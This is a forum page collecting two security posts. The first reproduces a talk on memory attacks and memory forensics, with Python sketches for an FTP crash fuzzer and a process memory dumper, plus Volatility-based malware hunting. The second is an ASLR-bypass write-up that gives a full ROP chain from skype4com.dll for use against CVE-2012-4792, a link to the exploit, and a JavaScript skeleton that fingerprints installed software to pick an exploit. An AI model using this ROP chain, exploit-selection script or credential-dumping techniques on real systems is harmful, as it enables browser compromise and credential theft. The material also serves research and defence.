Everything posted by Nytro

  1. [h=3]Manipulating Memory for Fun and Profit by Frédéric Bourla - High-Tech Bridge[/h]I am sure you remember the excellent reverse engineering presentations by High-Tech Bridge experts that I posted earlier. High-Tech Bridge presented at the ISACA event in Luxembourg, and you can download their detailed and very interesting presentation: “Manipulating Memory for Fun and Profit”. The presentation includes a detailed memory forensics process using Volatility, by Frédéric BOURLA, Chief Security Specialist, Head of Ethical Hacking & Computer Forensics Departments, High-Tech Bridge SA.
Table of Contents: 0x00 - About me; 0x01 - About this conference; 0x02 - Memory introduction; 0x03 - Memory manipulation from an offensive angle; 0x04 - Memory manipulation from a defensive angle; 0x05 - Conclusion.
Download the full presentation in PDF. The text of the presentation (for Google search, and to get an idea of the contents):
======================== Manipulating Memory for Fun & Profit 6 February 2013 Frédéric BOURLA Chief Security Specialist
======================== # readelf prez * Slides & talk in English. * Native French speaker, so feel free to send me an email in French in case of questions. * Talk focused on Memory Manipulation, from both offensive and defensive angles. * 1 round of 45’. * Vast topic, lots of issues to address, and lots of slides so that the most technical of you can come back later to remember commands. * Therefore some slides [especially at the beginning] will be fast, but everything is summarized in demos. * No need to take notes, all the slides and demos will be published on the High-Tech Bridge website.
======================== # readelf prez * Despite its name, this talk will not deal with Total Recall or any other movie based on human memory manipulation. * Nor will it deal with classical binary exploitation, such as Stack based Buffer Overflows or Heap Spraying. I strongly advise reading corelanc0d3rs’ papers on corelan.be to learn more about Exploit Writing.
======================== Table of contents 0x00 - About me 0x01 - About this conference 0x02 - Memory introduction 0x03 - Memory manipulation from an offensive angle 0x04 - Memory manipulation from a defensive angle 0x05 - Conclusion
======================== # man mem * RAM (Random Access Memory) is temporary memory accessible by the CPU in order to hold all of the program code and data that is processed by the computer. * It is called “random” because the system can directly access any of the memory cells anywhere on the RAM chip if it knows its row (i.e. “address”) and its column (i.e. “data bit”). * It is much faster to access data in RAM than on the hard drive. * The CPU and OS determine how much of the available memory will be used, and how.
======================== # man mem * In other words, most users do not have any control over memory, which makes RAM a target of choice. * The first systems were arbitrarily limited to 640 KB of RAM. Bill Gates once declared that “640K ought to be enough for anybody”. * At the time it was more than enough… but today the OS itself can consume 1 GB. We therefore use much more memory. * On a 32-bit Windows system, the OS can directly address 2^32 cells, and is therefore mathematically limited to 4 GB of memory.
======================== # man mem * Contrary to popular assumption, RAM can retain its content for up to several minutes after a shutdown. * Basically RAM is everywhere nowadays. Printers, fax machines, VoIP phones, GPS units and smartphones are good examples.
* This provides some opportunities to security professionals [and also to bad guys]. Some points of this talk can be applied to various targets and are not limited to Windows systems, even though from now on we will deal with a classical Microsoft host.
======================== # man mem * Upon process instantiation, the code is mapped in memory so that the CPU can read its instructions, and each process has its own virtual memory. * The OS relies on page table structures to transparently map each virtual memory address to physical memory. * But most importantly, any program [including both its data and its instructions] must first be loaded into memory before being run by the processor.
======================== # man mem * For example, FUD Trojans, which rely heavily on Packers & Crypters, can be quickly uncovered through memory analysis. * The same principle applies to OTFE. Memory Analysis can save an investigator's life, should you be facing a drive with On The Fly Encryption capabilities. To be efficient, transparent and usable, the [encrypted] key should be somewhere in memory.
======================== Table of contents 0x00 - About me 0x01 - About this conference 0x02 - Memory introduction 0x03 - Memory manipulation from an offensive angle 0x04 - Memory manipulation from a defensive angle 0x05 - Conclusion
======================== Post keylogging capacities * A colleague just used your laptop to access a restricted page, and you regret you didn’t have time to run your favourite keylogger? :-]
======================== Post keylogging capacities * Not a problem, you may be able to browse the web browser’s memory to grab their credentials.
======================== Post keylogging capacities * Joking aside, have you ever wished you had saved your new email before a touchpad problem occurred and made you lose 30 minutes of work?
======================== Post keylogging capacities * You may not have to rewrite everything from scratch if you browse the process memory soon enough.
======================== Stars revelation * In a pivoting attack, it can be very useful to reveal what’s behind the stars... Don’t forget, Windows remembers lots of passwords on behalf of users. * Lots of tools do exist, such as Snadboy's Revelation. Unfortunately, most of them do not work against recent OSes. * BulletsPassView is one of the remaining tools which still works under Windows 7. There is even a 64-bit version. * Anyway, it does not work under Windows 8 either.
======================== Stars revelation
======================== Stars revelation * Pillaging passwords often provides the keys to the kingdom.
======================== Memory Patching * Memory Patching is the first step in building a Crack or creating a Keygen in the Warez world. * It basically consists of locating and bypassing binary protections in memory, in order to finally implement the trick in the targeted file.
======================== Memory Fuzzing * Fuzz Testing, aka Fuzzing, consists of providing invalid, unexpected, or random data to the inputs of a monitored program to detect security issues [among others]. * General approach to Fuzzers:
======================== Memory Fuzzing * Memory-oriented Fuzzing:
======================== Memory Fuzzing * Here is an example from dbgHelp4j, a memory fuzzing project under development at High-Tech Bridge: * To learn more, read Xavier ROUSSEL’s paper. * This short demonstration shows how dbgHelp4j makes it possible to rapidly identify an old buffer overflow in the CWD command of Easy FTP Server v1.7.0.11.
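As a rough illustration of the fuzzing idea above (not of dbgHelp4j itself, which instruments the target in memory under a debugger), a minimal black-box sketch in Python can simply hammer the FTP CWD command with growing inputs until the service stops answering. The target address and credentials below are placeholders for a lab VM, and this is only a sketch of the classic network-level approach.

# Minimal black-box fuzzing sketch for an FTP "CWD" handler (illustration only).
# It sends increasingly long CWD arguments and watches for the service to stop
# responding, which is how the old Easy FTP Server CWD overflow can be
# rediscovered. Host, port and credentials are placeholders for a lab target.
import socket

TARGET = ("192.168.1.50", 21)            # lab VM running the vulnerable FTP server
USER, PASSWORD = "anonymous", "a@a"

def ftp_cwd(payload):
    """Log in, send one CWD with the payload, return True if the server answered."""
    try:
        s = socket.create_connection(TARGET, timeout=5)
        s.recv(1024)                                      # banner
        s.sendall(b"USER " + USER.encode() + b"\r\n"); s.recv(1024)
        s.sendall(b"PASS " + PASSWORD.encode() + b"\r\n"); s.recv(1024)
        s.sendall(b"CWD " + payload + b"\r\n")
        resp = s.recv(1024)                               # empty if the service died
        s.close()
        return bool(resp)
    except (socket.timeout, ConnectionError):
        return False

for length in range(100, 3000, 100):
    if not ftp_cwd(b"A" * length):
        print("[!] no response with a %d-byte CWD argument -> likely crash" % length)
        break
    print("[+] %d bytes handled" % length)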
======================== DLL Injection * Another well-known memory abuse consists of injecting arbitrary code into the memory space of another process, for example through a CreateRemoteThread-like function. * Such an injection permits the attacker to benefit from the rights of the target process, and often to bypass firewalls. * This also enables its author to hide from most users, as threads are not displayed in the Windows Task Manager.
======================== DLL Injection * The native Task Manager does not display the current threads within a process.
======================== DLL Injection * Here a DLL-based Reverse Trojan is injected into IE's memory space.
======================== DLL Injection * The Trojan reaches its C&C Server via HTTP through Internet Explorer [whose behaviour looks legitimate].
======================== DLL Injection * From a Pivoting Attack point of view, DLL Injection is widely used during Privilege Escalation. * There are a lot of tools, such as CacheDump, PWDump6, LSADump2 or PWDumpX. * Most tools actually inject their nasty code into the Local Security Authority Subsystem (LSASS) to reach the hashes. * The latter is amazingly efficient and permits a user with administrative privileges to retrieve [either locally or remotely] the domain password cache, password hashes and LSA secrets from a Windows system.
======================== Process Memory Dump * Some processes write sensitive data in memory in clear text, or without relying on heavy encryption. * Specific process memory dumps may allow an attacker to grab interesting data. * Lots of tools do exist. One of the best is probably ProcDump, from Mark Russinovich. * It’s a powerful command-line utility whose primary purpose is to monitor applications for CPU spikes and generate a crash dump to help the developer debug them.
======================== Process Memory Dump * It has plenty of amazing features. Anyway, here our goal is simply to dump the memory contents of a process to a file [without stopping the process, of course]. * So lots of tools can also do the job, such as PMDump from NTSecurity. * Sometimes we can find very sensitive information, such as usernames, computer names, IP addresses, and even passwords. * This is for example the case if you dump the memory of PwSafe. Not all fields are encrypted in memory.
======================== Process Memory Dump * For sure, password fields are not stored in memory in plaintext, but unfortunately other fields are. And sysadmins’ notes are often very juicy... * There is a chance to collect credentials, map network resources, identify services, ports, sudoer accounts, and so on. * Even if the auditor is unlucky and does not grab passwords, he can still create a user list file for further dictionary attacks.
======================== Process Memory Dump * Process Memory Dump files are quite light. * During a Pivoting Attack in an Internal Penetration Test, it may be worth trying a memory dump against sensitive processes.
======================== Process Memory Dump * Something as easy as parsing the process memory dump for strings may reveal interesting stuff to a pentester.
======================== Process Memory Dump * Here the Password Safe application permits an attacker to fingerprint the network, and to collect usernames, IP addresses and ports. * Very useful for carrying out further attacks.
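To make the process memory dump step above more concrete, here is a minimal Python sketch of what PMDump-style tools do on Windows: open the target process, walk its address space with VirtualQueryEx and copy every committed region to a file with ReadProcessMemory. The PID is a placeholder, the caller needs suitable privileges over the target, and error handling is intentionally minimal.

# Rough sketch of a process memory dumper on Windows (illustration only).
import ctypes
from ctypes import wintypes

PROCESS_QUERY_INFORMATION = 0x0400
PROCESS_VM_READ = 0x0010
MEM_COMMIT = 0x1000

class MEMORY_BASIC_INFORMATION(ctypes.Structure):
    _fields_ = [("BaseAddress", ctypes.c_void_p),
                ("AllocationBase", ctypes.c_void_p),
                ("AllocationProtect", wintypes.DWORD),
                ("RegionSize", ctypes.c_size_t),
                ("State", wintypes.DWORD),
                ("Protect", wintypes.DWORD),
                ("Type", wintypes.DWORD)]

def dump_process(pid, out_path):
    # Open the target with just enough rights to query and read its memory.
    k32 = ctypes.windll.kernel32
    handle = k32.OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, False, pid)
    if not handle:
        raise OSError("OpenProcess failed (check the PID and your privileges)")
    mbi = MEMORY_BASIC_INFORMATION()
    addr = 0
    with open(out_path, "wb") as out:
        # Walk the address space region by region until VirtualQueryEx fails.
        while k32.VirtualQueryEx(handle, ctypes.c_void_p(addr),
                                 ctypes.byref(mbi), ctypes.sizeof(mbi)):
            if mbi.State == MEM_COMMIT:
                buf = ctypes.create_string_buffer(mbi.RegionSize)
                read = ctypes.c_size_t(0)
                if k32.ReadProcessMemory(handle, ctypes.c_void_p(addr), buf,
                                         ctypes.c_size_t(mbi.RegionSize),
                                         ctypes.byref(read)):
                    out.write(buf.raw[:read.value])    # keep only what was readable
            addr += mbi.RegionSize                      # jump to the next region
    k32.CloseHandle(handle)

if __name__ == "__main__":
    dump_process(1234, "process_1234.dmp")              # 1234 is a placeholder PID

Feeding the resulting file to strings, as shown further down in the slides, is usually enough to surface hostnames, usernames and paths.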
======================== Process Memory Dump * Here the network administration tool mRemote leaks the internal path, IP address and TCP port of an SSH-enabled server… as well as the username & password of a root account!
======================== Full Memory Dump * If you have good bandwidth and you are not too limited by time, why not dump the whole memory? * An offline analysis of the whole memory dump may reveal even more important stuff. Even in the case of FDE, users may have opened sensitive TXT documents, for example. * You may add DumpIt to your toolkit. It is a one-click memory acquisition application for Windows released by MoonSols. It’s a great tool which combines win32dd and win64dd in one executable. It is fast, small, portable, free and ultra easy to use. Just run it to dump the physical memory into the current directory.
======================== Cold Boot Attacks * It is a common belief that RAM loses its content as soon as the power is off. * This is wrong, RAM is not immediately erased. It may take up to several minutes in a standard environment, even if the RAM is removed from the computer. * And it may last much longer if you cool the DRAM chips. With a simple blast of duster spray at -50°C, your RAM data can survive more than 10 minutes. * If you cool the chips to -196°C with liquid nitrogen, the data are held for several hours without any power.
======================== Cold Boot Attacks * It is then possible to plug the RAM into another system and dump its content for offline analysis. * In particular, encryption tools deeply rely on RAM to store their keys. Therefore such attacks are mostly aimed at defeating FDE, such as BitLocker, FileVault, dm-crypt, and TrueCrypt. * And even if there is some degradation of the memory contents, some algorithms can intelligently recover the keys. * To learn more, read the Princeton University paper.
======================== DMA based attacks * IEEE 1394, aka FireWire, is a serial bus interface standard for high-speed communications and isochronous real-time data transfer. * According to Wikipedia, it “supports DMA and memory-mapped devices, allowing data transfers to happen without loading the host CPU with interrupts and buffer-copy operations”. * In other words, you can read [and write] the target’s memory through its FireWire interface! * This security problem is not new [2004], but it still exists today as it stems from the IEEE 1394 specifications themselves.
======================== DMA based attacks * A few years ago, attackers could use WinLockPwn. Today they have the Inception tool, from ntropy. * Inception is a physical memory manipulation and hacking tool which nicely exploits IEEE 1394 SBP-2 DMA [Serial Bus Protocol 2]. * The tool can unlock and escalate privileges to Administrator / Root on almost any powered-on machine you have physical access to. * The tool works over any interface that expands and can master the PCIe bus, such as FireWire, Thunderbolt, ExpressCard and PCMCIA (PC-Card).
======================== DMA based attacks * It was initially made to attack computers that use FDE, such as BitLocker, FileVault, TrueCrypt or Pointsec. * You just need a Linux / Mac OS X system and a target which provides a FireWire / Thunderbolt interface, or an ExpressCard / PCMCIA expansion port.
* There are of course some limitations, such as the 4 GiB RAM bug or the restrictions on OS X Lion targets [which disables DMA when the user is logged out, as well as when the screen is locked if FileVault is enabled], but most often FireWire means P0wned.
======================== DMA based attacks * Just a few lines to install it on your BackTrack: * The following short demo of Inception exploits the FireWire interface of an up-to-date Windows 7 system to patch the msv1_0.dll file and unlock the running session.
======================== DMA based attacks * This kind of DMA-based attack also makes it possible to attack mounted encrypted volumes, such as a TrueCrypt archive. * You can for example boot your attacking system with the PassWare FireWire Memory Imager from Passware Kit Forensics, and search for AES keys in the target memory through FireWire. * You can basically defeat BitLocker, TrueCrypt, FileVault2 & PGP encrypted volumes. * To learn more: http://www.breaknenter.org/projects/inception/ http://support.microsoft.com/kb/2516445
======================== DMA based attacks * The following slides illustrate an attack on a TrueCrypt volume created on an 8 GB memory stick. * The first step was to back up the encrypted drive.
======================== DMA based attacks * Then let’s begin the attack on a mounted volume once the user has gone away.
======================== DMA based attacks * Dump the physical memory of the target system through our favourite FireWire interface.
======================== DMA based attacks * And attack the key material in memory…
======================== DMA based attacks * The attack only lasts a couple of minutes.
======================== DMA based attacks * And you should get an unencrypted raw volume.
======================== DMA based attacks * You just have to fill a new memory stick with this raw image…
======================== DMA based attacks * And that’s it! Just plug in your new device…
======================== DMA based attacks * And enjoy your TrueCrypt-less volume.
======================== Table of contents 0x00 - About me 0x01 - About this conference 0x02 - Memory introduction 0x03 - Memory manipulation from an offensive angle 0x04 - Memory manipulation from a defensive angle 0x05 - Conclusion
======================== Circumventing FDE * The traditional Forensics approach faces problems with encryption, especially with FDE. * If the investigator “pulls the plug” and creates a bit-for-bit image of the physical hard drive, he most probably destroys the best chance of recovering the plaintext data, as well as all the common memory artefacts. * With FDE, it is usually far better to make a bit-for-bit image of the logical device while the system is still running, even if the underlying disk activity is generally not welcome… and even if we rely on an untrusted OS to present what is actually on the disk, and are therefore prone to anti-forensic techniques.
======================== Circumventing FDE * If we begin by capturing the volatile memory, then we can potentially extract the cryptographic keys from the memory image to decrypt and analyse the disk image. * The only real challenge usually consists of uniquely identifying key material among gigabytes of other data. * It is usually achieved with a mix of entropy analysis [limited because of the short length of symmetric keys and the randomness of other data, such as compressed files] and brute-force attacks [Known-Plaintext Attacks, where the attacker has samples of both the plaintext and the ciphertext].
* To learn more: “RAM is Key - Extracting Disk Encryption Keys From Volatile Memory”, by B. Kaplan and M. Geiger.
======================== Code Analysis via API Hooking * A quick way to get an idea of what a binary does is to analyse its API calls. * You can do it easily with APISpy32 for example, from Pietrek. * You just need to populate a configuration file with the names of all the APIs [e.g. obtained via strings] you want to hook, and you get a nice malcode monitoring tool. * The next slide shows common API use in malware.
======================== Code Analysis via API Hooking * Common API -> Malware:
* URLDownloadToFile, FtpGetFile, FtpOpenFile -> Dropper
* CreateRemoteThread, NtWriteVirtualMemory, LoadLibrary and similar (LoadLibraryA, LoadLibraryExA, LoadLibraryExW, etc.) -> Injection
* BeginPaint (to disable local screen changes when a VNC session is activated) -> Zeus
* Accept, Bind -> Backdoor
* Connect, CreateNamedPipe, ConnectNamedPipe, DisconnectNamedPipe -> Dropper and Reverse Trojan
* IsDebuggerPresent, CheckRemoteDebuggerPresent -> Anti-debugger
======================== Code Analysis via API Hooking * Common API -> Malware:
* CryptCreateHash, CryptEncrypt, CryptGetHashParam -> Encryption
* DeviceIoControl, NtLoadDriver, NtOpenProcess -> Rootkit
* HttpOpenRequest, HttpSendRequest, InternetConnect -> Exfiltration
* ModifyExcuteProtectionSupport, EnableExecuteProtectionSupport, NtExecuteAddFileOptOutList -> DEP
* SetSfcFileException -> Windows File Protection alteration
======================== Memory Forensics * It is probably the best way to identify the most hidden evil code, such as Rootkits. * And don't forget that some malware can live in memory without ever touching the hard disk. This is for example the case with the MSF Meterpreter, which is injected into existing process memory. * Stealth malware also works in that manner [mostly in targeted hacking against big companies]. * Hard disks are amazingly big today. Simply creating a raw image can take a very long time... sometimes several days. Analysing memory is much faster.
======================== Memory Forensics * But there are also some minor drawbacks… Indeed, the memory image will only give us information on what was running at a particular time. We will not see the most visible piece of malcode if it was not running when we proceeded with the imaging [unless some traces remain in undeleted structures]. * And for sure, to make an image of the memory we first need to run a specific utility once... which will itself be loaded into the targeted memory! As a consequence, it is always possible to alter evidence [even if the chances are really low with a lightweight utility]. * Anyway, it is definitely worth a try, as a fast analysis can help you spot the evidence very quickly. :-]
======================== Memory Forensics * Any kind of physical memory capture can be used, such as a Memory Dump, a Crash Dump, a hibernation file or a VMEM file for virtual machines.
======================== Memory Forensics * Memory Forensics is a huge undertaking, as memory mappings differ across OS, SP and patch levels, and as vendors usually do not really document their internal memory structures. * Nevertheless, it has been mature and efficient for a few years now. Nowadays, we are no longer limited to ASCII and Unicode grep, and we can rely on powerful tools which parse well-known memory structures.
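As a toy illustration of the entropy analysis mentioned in the Circumventing FDE slides above, the following Python sketch slides a window over a raw memory dump and flags high-entropy regions as candidate key material. Real key-recovery tools go further and validate structures such as the AES key schedule, so expect plenty of false positives (compressed or encrypted data score just as high); the dump filename is a placeholder.

# Sliding-window entropy scan over a raw memory dump (illustration only).
import math
from collections import Counter

WINDOW = 1024        # bytes per window
STEP = 1024          # slide granularity (non-overlapping windows here)
THRESHOLD = 7.5      # bits of entropy per byte; 8.0 is the theoretical maximum

def shannon_entropy(chunk):
    # Entropy in bits per byte of the given chunk.
    counts = Counter(chunk)
    total = len(chunk)
    return -sum(c / total * math.log2(c / total) for c in counts.values())

def scan(path):
    with open(path, "rb") as f:
        offset = 0
        while True:
            chunk = f.read(WINDOW)
            if len(chunk) < WINDOW:
                break
            ent = shannon_entropy(chunk)
            if ent >= THRESHOLD:
                yield offset, ent
            offset += STEP

if __name__ == "__main__":
    for off, ent in scan("memdump.raw"):                 # placeholder dump file
        print("candidate key material at offset 0x%08x (entropy %.2f)" % (off, ent))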
======================== Memory Forensics * For sure, we are still facing challenging problems, and tools may be limited by Paging and Swapping, which can prevent investigators from analysing the whole virtual address space of a specific process [unless they also dig into the pagefile.sys, for example]… * But it is still really effective for Malware Analysis! * Besides commercial tools, free solutions do exist, such as Radare and Volatility. The latter has simply become impressive. * Since last year, Volatility also supports Mac systems.
======================== Memory Forensics * Should you need to carry out Memory Forensics on a Windows, Linux, Mac or Android system, I strongly advise you to have a look at Volatility. * It is basically a Python-based tool for extracting digital artefacts from volatile memory [RAM] samples, which offers amazing visibility into the runtime state of the system. * You can easily identify running processes and their DLLs, Virtual Address Descriptors [VAD], system call tables [IDT, GDT, SSDT], environment variables, network connections, open handles to kernel and executive objects, and so on.
======================== Memory Forensics * It can even be used to dump LM and NTLM hashes, as well as LSA secrets…
======================== Memory Forensics * Well, for French targets there is a little bug [because of accents]... You will have to adapt the code a little bit:
======================== Memory Forensics * But besides this, it is really efficient for tracking malcode. Let’s dig into a real example…
======================== Memory Forensics * Heavy malware may be digitally signed by a trusted CA.
======================== Memory Forensics * And may really appear benign to your users.
======================== Memory Forensics * Here it was an obfuscated .Net-based Dropper.
======================== Memory Forensics * Even if you manually find the embedded payload, nearly everything is packed to disturb Reverse Engineers.
======================== Memory Forensics * The only unencrypted payload was a kind of anti-removal feature, which basically hooks specific APIs to prevent system administrators from removing the malware [e.g. by killing their task manager]. * And then? What’s next? We could spend lots of time in a Reverse Engineering phase, or analyse its behaviour in a sandbox [if the code doesn’t detect it]… * …Or we can simply see what happens in memory.
======================== Memory Forensics * Just voluntarily infect your VM or your lab workstation. * And use one of the good existing tools to dump the whole memory: * Memoryze from Mandiant * FTK Imager from AccessData * FastDump from HB Gary * DumpIt and Win32dd / Win64dd from MoonSols * And of course your favourite FireWire interface * Before using Volatility to dissect this memory dump.
======================== Memory Forensics * Let’s begin by getting basic information on our dump file.
======================== Memory Forensics * The PSLIST command quickly shows processes.
======================== Memory Forensics * You can arrange them in a tree view.
======================== Memory Forensics * This process list can be quickly obtained by parsing a Kernel doubly-linked list. Nevertheless, this list can be altered by malware, such as Rootkits, which thereby hide themselves from common system tools. * A deeper search can then be performed, which consists of parsing the whole memory dump to locate EPROCESS structures.
These Kernel structures exist for each process, no matter what the doubly-linked list [known as the Process Control Block] says. * A process listed in a PSSCAN and not in a PSLIST often indicates a threat [mostly made possible via API Hooking].
======================== Memory Forensics * The PSSCAN takes longer but may reveal hidden code.
======================== Memory Forensics * Similarly, you can find processes which attempt to hide themselves from the various process listings through the PSXVIEW command:
======================== Memory Forensics * Several Volatility commands work in this way and offer a SCAN variant to try to recognize specific structures in memory, thus revealing hidden sockets and connections for example. * For sure you may have [often quickly identified] false positives, as some processes may have been legitimately closed, for example, thus leaving some orphan EPROCESS data structures in RAM. * Nevertheless, some processes may still really be running, and therefore instantly reveal a serious security issue.
======================== Memory Forensics * Established and recently closed connections are also quickly revealed.
======================== Memory Forensics * And you can also easily explore the registry, which is widely used by malcode writers for various purposes [e.g. to allow their code to survive a reboot].
======================== Memory Forensics * As well as querying loaded drivers [often used by Rootkits].
======================== Memory Forensics * You can even parse loaded libraries to detect API Hooking, also widely used by Rootkits. Here a trampoline has been placed in the wbemcomm DLL [to hook certain WMI queries].
======================== Memory Forensics * You can extract suspicious files [by PID or offset] from the memory dump to carry out further investigation.
======================== Memory Forensics * And quickly identify a Key Logger.
======================== Memory Forensics * In fact, you can enumerate all opened files and even the loaded DLLs within a specific process… and drop them back on disk for investigation.
======================== Memory Forensics * The dumped process may not be runnable, but it will still offer you fairly easy-to-understand code [at least you no longer have to unpack it]. For example: strings dumpedfile | egrep -i 'http|ftp|irc|\.exe' * Even more powerful, you can rely on the MALFIND command to perform advanced searches using Regex, Unicode or ANSI strings... * And most importantly, it makes it possible to quickly find hidden or injected code through VAD tree inspection [very useful in the case of a DLL which has been unlinked from the LDR lists by the malcode loader in order to avoid detection].
======================== Memory Forensics * Here the MALFIND command reveals that arbitrary code was injected into the CSRSS.exe system process.
======================== Memory Forensics * We can quickly parse the MALFIND results to bring out the running processes which were infected by such code injection.
======================== Memory Forensics * Even powerful rootkits quickly draw your attention.
======================== Memory Forensics * We can also use the Yara malware identification feature to directly scan for patterns inside a PID or within a specific memory segment. Here we see that injected code inside the SVCHOST process established a connection to dexter.servequake.com:4444 via HTTP and downloaded the 1234567890.functions resource.
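The same Yara-based check can be reproduced outside Volatility once a segment has been extracted. The sketch below uses the yara-python module against a dumped segment; the rule strings simply reuse the indicators quoted in the slide above, and the segment filename is an illustrative placeholder.

# Scan an extracted memory segment with a small Yara rule (illustration only).
import yara

RULE_SOURCE = r"""
rule suspected_rat_beacon
{
    strings:
        $host = "dexter.servequake.com" nocase
        $res  = "1234567890.functions"
    condition:
        any of them
}
"""

rules = yara.compile(source=RULE_SOURCE)

# Scan a segment previously dumped to disk (e.g. with malfind --dump-dir);
# rules.match() also accepts data=... for raw bytes instead of a file path.
for match in rules.match("process.0x81d9d2d8.dmp"):      # placeholder dump name
    print("matched rule: %s (%d string hits)" % (match.rule, len(match.strings)))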
======================== Memory Forensics * For sure, the RAT payload is encrypted, but in a few minutes you have identified the threat and dug quite deeply into the real problem.
======================== Memory Forensics * You can now extract the guilty binary code along with the related memory segments and begin a classical malware analysis.
======================== Memory Forensics * And if you like a high-level view for your incident report, why not extend Volatility with Graphviz to make something more visual?
======================== Memory Forensics * That’s it. I hope I have piqued your interest with one of the most important Forensics innovations of the last few years. The whole demo is attached here. * To learn more: SANS Forensics 610 Training Course [GREM] https://www.volatilesystems.com/default/volatility http://www.microsoft.com/whdc/system/platform/firmware/PECOFF.mspx http://www.ualberta.ca/CNS/RESEARCH/LinuxClusters/mem.html http://www.tenouk.com/visualcplusmfc/visualcplusmfc20.html
======================== Table of contents 0x00 - About me 0x01 - About this conference 0x02 - Memory introduction 0x03 - Memory manipulation from an offensive angle 0x04 - Memory manipulation from a defensive angle 0x05 - Conclusion
======================== Conclusion * I hope I have achieved my goal of opening the doors to a fascinating world which could easily allow security analysts to save lots of time during their recurrent duties… * …And that you will see your own systems [and the ones you assess] from a different angle. * …And that you will now have the reflex of dumping the whole memory in case of an incident. * …And that you will reconsider security where the physical aspect is concerned. :-]
Sursa: contagio: Manipulating Memory for Fun and Profit by Frédéric Bourla - High-Tech Bridge
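On the Graphviz idea mentioned in the slides above: turning pslist-style output into a picture only takes a few lines. The sketch below converts (pid, ppid, name) triples into a DOT process tree that can be rendered with dot -Tpng; the sample triples are invented, and in practice you would parse real pslist or pstree output.

# Build a DOT process tree from (pid, ppid, name) triples; render afterwards
# with:  dot -Tpng procs.dot -o procs.png
PROCESSES = [
    (4,    0,   "System"),
    (368,  4,   "smss.exe"),
    (584,  368, "csrss.exe"),
    (880,  608, "svchost.exe"),
    (1652, 880, "suspicious.exe"),     # hypothetical injected child process
]

def to_dot(procs):
    lines = ["digraph pstree {", '  node [shape=box, fontname="Courier"];']
    for pid, ppid, name in procs:
        lines.append('  p%d [label="%s\\n(PID %d)"];' % (pid, name, pid))
    known = {pid for pid, _, _ in procs}
    for pid, ppid, _ in procs:
        if ppid in known:              # only draw edges whose parent we know
            lines.append("  p%d -> p%d;" % (ppid, pid))
    lines.append("}")
    return "\n".join(lines)

with open("procs.dot", "w") as fh:
    fh.write(to_dot(PROCESSES))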
  2. [h=2]Bypassing Windows ASLR using “skype4COM” protocol handler[/h] While investigating an unrelated issue using the SysInternals Autoruns tool, I spotted a couple of protocol handlers installed on the system by Skype. Knowing that protocol handlers can be loaded by Internet Explorer without any prompts, I decided to check if these libraries have their dynamic base bit set. It turns out that the “skype4com.dll” library does not, which means it could be used to bypass Windows ASLR, so I got to work writing my ROP chain and testing it out. A quick test to see if it indeed loads up can be done with the code below:
<SCRIPT language="JavaScript">
location.href = 'skype4com:'
</SCRIPT>
Filename - Skype4COM.dll
Path - C:\Program Files\Common Files\Skype\
MD5 hash - 6e04c50ca4a3fa2cc812cd7ab84eb6d7
Size - 2,156,192 bytes
Signed - 03 November 2011 11:46:40
Version - 1.0.38.0
And here is my ROP chain without any nulls:
0x28025062 # POP EBX # RETN
0xa13fcde1 # 0xA13FCDE1
0x28024f71 # POP EAX # RETN
0x5ec03420 # 0x5EC03420
0x28027b5c # ADD EBX,EAX # XOR EAX,EAX # RETN (EBX=0x201, 513 bytes)
0x28024f71 # POP EAX # RETN
0xa13fcde1 # 0xA13FCDE1
0x280b4654 # ADD EAX,5EC0325F # RETN
0x28099a83 # MOV EDX,EAX # MOV EAX,ESI # POP ESI # RETN (EDX=0x40)
0x41414141 # Compensate
0x28017271 # POP ECX # RETN
0x280de198 # VirtualProtect() pointer [IAT]
0x28027b5b # MOV EAX,DWORD PTR DS:[ECX] # RETN
0x28041824 # XCHG EAX,ESI # ADD EAX,48C48300 # RETN 0x08
0x2806405a # POP EBP # RETN
0x41414141 # Compensate
0x41414141 # Compensate
0x280bc55b # & push esp # ret
0x28017271 # POP ECX # RETN
0x28126717 # &Writable location
0x28098730 # POP EDI # RETN
0x28098731 # RETN (ROP NOP)
0x28024f71 # POP EAX # RETN
0x90909090 # nop
0x28043527 # PUSHAD # RETN
I’ve created an exploit using this ROP chain on the “CButton Object Use-After-Free vulnerability” (CVE-2012-4792) taken from Metasploit. It has been tested on Windows 7 Enterprise (32-bit) in a VM with the latest version of Skype installed (6.2.59.106). The exploit can be downloaded from here; the password is “exploit” and the MD5 hash of the zip file is 4d5735ff26b769abe1b02f74e2871911.
Mitigation? Well I said it before and I’ll say it again . . . “EMET” your machines ASAP.
On a somewhat off-topic note, I was looking at the HTML code posted on Pastebin for the CVE-2012-4792 exploit and liked the way it checked to see whether Office 2010 or 2007 was installed. Some blog posts weren’t as clear as to what the Office check routine was actually doing, but really it was just determining which hxds.dll version to use for its ROP chain for the Office version it detected. (I haven’t got the actual exploit files to confirm, but I’m pretty sure.)
For Office 2010 it installs 4 OpenDocuments ActiveX objects:
SharePoint.OpenDocuments.4
SharePoint.OpenDocuments.3
SharePoint.OpenDocuments.2
SharePoint.OpenDocuments.1
and Office 2007 only 3:
SharePoint.OpenDocuments.3
SharePoint.OpenDocuments.2
SharePoint.OpenDocuments.1
So basically, if the JavaScript is able to load “SharePoint.OpenDocuments.4” then it knows that it’s Office 2010. Since these ActiveX controls can be run without permissions, no prompts are given. Below is a simple script that could be used to check whether, in this example, Windows 7 with IE8 has Office 2007/2010 or Java 6 installed. No Skype ActiveX controls get installed that can be run without permissions, so I couldn’t work out how to check if Skype is installed without triggering prompts in Internet Explorer. If you do know how to check without triggering prompts, please do share.
<HTML>
<SCRIPT language="JavaScript">
//
//
if (CheckIEOSVersion() == "ie8w7") {
    if (CheckOfficeVersion() == "Office2010") {
        // Exploit call here
    } else if (CheckOfficeVersion() == "Office2007") {
        // Exploit call here
    } else if (JavaVersion() == "Java6") {
        // Exploit call here
    } else if (SkypeCheck() == "") {
        // Exploit call here
    }
}
//
//
function CheckIEOSVersion() {
    var agent = navigator.userAgent.toUpperCase();
    var os_ie_ver = "";
    //
    if ((agent.indexOf('NT 5.1') > -1)&&(agent.indexOf('MSIE 7') > -1)) os_ie_ver = "ie7wxp";
    if ((agent.indexOf('NT 5.1') > -1)&&(agent.indexOf('MSIE 8') > -1)) os_ie_ver = "ie8wxp";
    if ((agent.indexOf('NT 6.0') > -1)&&(agent.indexOf('MSIE 7') > -1)) os_ie_ver = "ie7wv";
    if ((agent.indexOf('NT 6.0') > -1)&&(agent.indexOf('MSIE 8') > -1)) os_ie_ver = "ie8wv";
    if ((agent.indexOf('NT 6.1') > -1)&&(agent.indexOf('MSIE 8') > -1)) os_ie_ver = "ie8w7";
